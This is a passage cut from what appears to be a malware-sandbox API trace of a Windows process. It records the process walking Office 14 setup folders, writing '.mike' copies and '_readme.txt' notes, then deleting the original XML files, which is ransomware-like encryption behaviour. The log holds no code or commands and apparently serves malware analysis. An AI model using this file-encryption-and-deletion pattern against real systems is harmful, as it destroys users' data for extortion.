Controller\\Proof.es\\Proof.XML", dwFileAttributes=0x80) returned 1 [0052.920] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml")) returned 1 [0052.922] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b7fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe8d69140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d69140, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.922] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d42fe0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d42fe0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d69140, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.XML.mike", cAlternateFileName="PROOFX~1.MIK")) returned 1 [0052.922] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d69140, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d69140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d69140, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.922] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d69140, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d69140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d69140, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.922] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.922] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.922] CoTaskMemFree (pv=0x502980) [0052.923] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7941190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.923] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2bd90c0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.XML", cAlternateFileName="")) returned 1 [0052.923] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.923] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.927] WriteFile (in: hFile=0x288, lpBuffer=0x22e3314*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22e3314*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.927] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML", dwFileAttributes=0x80) returned 1 [0052.928] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml")) returned 1 [0052.929] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7941190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe8d69140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d69140, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.930] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d69140, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d69140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d69140, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.XML.mike", cAlternateFileName="PROOFX~1.MIK")) returned 1 [0052.930] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d69140, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d69140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d69140, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.930] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d69140, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d69140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d69140, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.930] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.930] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.930] CoTaskMemFree (pv=0x502980) [0052.930] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab640f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab8a250, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.930] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf00db300, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proofing.XML", cAlternateFileName="")) returned 1 [0052.930] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58c6830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.930] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.931] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.935] WriteFile (in: hFile=0x288, lpBuffer=0x22f5978*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22f5978*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.935] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML", dwFileAttributes=0x80) returned 1 [0052.936] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml")) returned 1 [0052.938] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.946] WriteFile (in: hFile=0x288, lpBuffer=0x2108744*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2108744*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.946] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.947] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\setup.xml")) returned 1 [0052.949] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab640f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe8d8f2a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d8f2a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.949] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d69140, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d69140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d8f2a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x550, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proofing.XML.mike", cAlternateFileName="PROOFI~1.MIK")) returned 1 [0052.949] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d8f2a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d8f2a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8d8f2a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1920, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0052.949] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d8f2a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d8f2a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8db5400, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.950] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d8f2a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8d8f2a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8db5400, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.950] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.950] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.950] CoTaskMemFree (pv=0x502980) [0052.954] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6cd64f50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.954] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x170fe40, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPlusrWW.XML", cAlternateFileName="PROPLU~1.XML")) returned 1 [0052.954] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18177c50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a95a430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.954] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.957] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.962] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML", dwFileAttributes=0x80) returned 1 [0052.962] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml")) returned 1 [0052.965] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.971] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\setup.xml")) returned 1 [0052.973] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe8ddb560, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8ddb560, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.973] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8db5400, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8db5400, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8db5400, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPlusrWW.XML.mike", cAlternateFileName="PROPLU~1.MIK")) returned 1 [0052.973] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8ddb560, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8ddb560, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8ddb560, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0052.973] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8db5400, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8db5400, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8ddb560, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.973] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8db5400, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8db5400, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8ddb560, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.973] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.973] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.974] CoTaskMemFree (pv=0x502980) [0052.974] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba9ab90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1bc89d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bc89d70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.974] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3e4630, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x1ba9ab90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.XML", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0052.975] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x1bc89d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.975] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.975] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.980] WriteFile (in: hFile=0x288, lpBuffer=0x2178bd4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2178bd4*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML", dwFileAttributes=0x80) returned 1 [0052.980] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml")) returned 1 [0052.983] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.987] WriteFile (in: hFile=0x288, lpBuffer=0x2189494*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2189494*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.988] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml")) returned 1 [0052.990] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba9ab90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe8e016c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8e016c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.990] FindNextFileW (in: 